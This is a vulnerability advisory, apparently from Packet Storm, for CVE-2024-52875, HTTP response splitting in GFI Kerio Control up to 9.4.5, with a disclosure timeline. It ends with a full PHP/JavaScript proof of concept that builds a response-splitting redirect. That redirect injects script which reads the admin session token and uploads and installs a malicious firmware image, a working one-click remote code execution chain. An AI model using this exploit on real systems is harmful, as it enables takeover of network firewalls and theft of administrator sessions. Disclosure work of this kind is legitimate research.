--------------------------------------------------------------------------- GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities --------------------------------------------------------------------------- [-] Software Links: https://gfi.ai/products-and-solutions/network-security-solutions/keriocontrol http://download.kerio.com [-] Affected Versions: All versions from 9.2.5 to 9.4.5. [-] Vulnerabilities Description: There are multiple HTTP Response Splitting vulnerabilities in GFI Kerio Control. Following are some of the affected pages: - /nonauth/addCertException.cs - /nonauth/guestConfirm.cs - /nonauth/expiration.cs User input passed to these pages via the "dest" GET parameter is not properly sanitized before being used to generate a "Location" HTTP header in a 302 HTTP response. Specifically, the application does not correctly filter/remove linefeed (LF) characters. This can be exploited to perform HTTP Response Splitting attacks, which in turn might allow to carry out Reflected Cross-Site Scripting (XSS) and possibly other attacks. NOTE: the Reflected XSS vector might be abused to perform 1-click Remote Code Execution (RCE) attacks. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2024-52875.php [ Packet Storm note: See bottom for poc ] [-] Solution: No official solution is currently available. [-] Disclosure Timeline: [06/11/2024] - Vulnerabilities details sent to the vendor [07/11/2024] - Vendor response stating "we’ll take steps to resolve these vulnerabilities in coming releases of Kerio Control" [07/11/2024] - CVE identifier requested [17/11/2024] - CVE identifier assigned [17/11/2024] - Vendor was contacted inquiring about the ETA for the next Kerio Control release; no response [28/11/2024] - Vendor was contacted again and provided with a 1-click RCE Proof of Concept script, emphasizing these should be considered high-risk vulnerabilities that should be addressed as soon as possible [28/11/2024] - Vendor response stating "thank you very much for this information, I will immediately consult with rest of the team" [03/12/2024] - Vendor email stating "would you mind to share with us any script you used while exploiting the vulnerabilities?" [03/12/2024] - Proof of Concept script and replication steps sent to the vendor, along with a follow-up inquiry about the ETA for a patched Kerio Control version; no response [06/12/2024] - Vendor was informed that public disclosure is scheduled to occur within two weeks [11/12/2024] - Vendor response stating "these vulnerabilities were already fixed and will be part of Kerio Control 9.4.5p1 which is now with our internal QA team" [16/12/2024] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-52875 to these vulnerabilities. [-] Credits: Vulnerabilities discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2024-07 [-] Technical Writeup: https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875 ------------------------- url = "https://' . $target . ':4081/admin"; _token = ""; _id = ""; function createIFrame(file, id) { iframe = document.createElement("iframe"); iframe.src = url + "/constants.js"; iframe.style.display = "none"; iframe.sandbox = "allow-scripts allow-same-origin"; iframe.onload = function() { cookie = iframe.contentWindow.document.cookie; var re = new RegExp(name + "=([^;]+)"); var value = re.exec(cookie); var token = (value != null) ? unescape(value[1]) : null; uploadImage(file, id, token); }; document.body.appendChild(iframe); } function uploadImage(file, id, token) { _id = id; _token = token; var xhr = new XMLHttpRequest(); xhr.open("POST", url + "/api/jsonrpc/", true); xhr.addEventListener("load", performCustomUpgrade); xhr.setRequestHeader("X-Token", token); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}})); } function performCustomUpgrade() { var xhr = new XMLHttpRequest(); xhr.open("POST", url +"/api/jsonrpc/", true); xhr.setRequestHeader("X-Token", _token); xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest"); xhr.setRequestHeader("Content-Type", "application/json"); xhr.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id}})); } var xhr = new XMLHttpRequest(); xhr.open("POST", url + "/api/jsonrpc/upload/", true); xhr.addEventListener("load", function() { obj = JSON.parse(this.responseText); file = obj.result.fileUpload.name; id = obj.result.fileUpload.id; createIFrame(file, id); }); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1337"); xhr.withCredentials = true; var body = "-----------------------------1337\r\n" + "Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + atob("' . $upgrade . '") + "\r\n-----------------------------1337--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); '; $body = zlib_encode($body, ZLIB_ENCODING_DEFLATE); $payload = (preg_match("/Firefox/", $_SERVER["HTTP_USER_AGENT"])) ? "resource://xss" : ""; $payload .= "\nContent-Length: " . strlen($body); $payload .= "\n\n{$body}"; header("Location: https://{$target}:4081/nonauth/guestConfirm.cs?dest=" . urlencode(base64_encode($payload))); ?>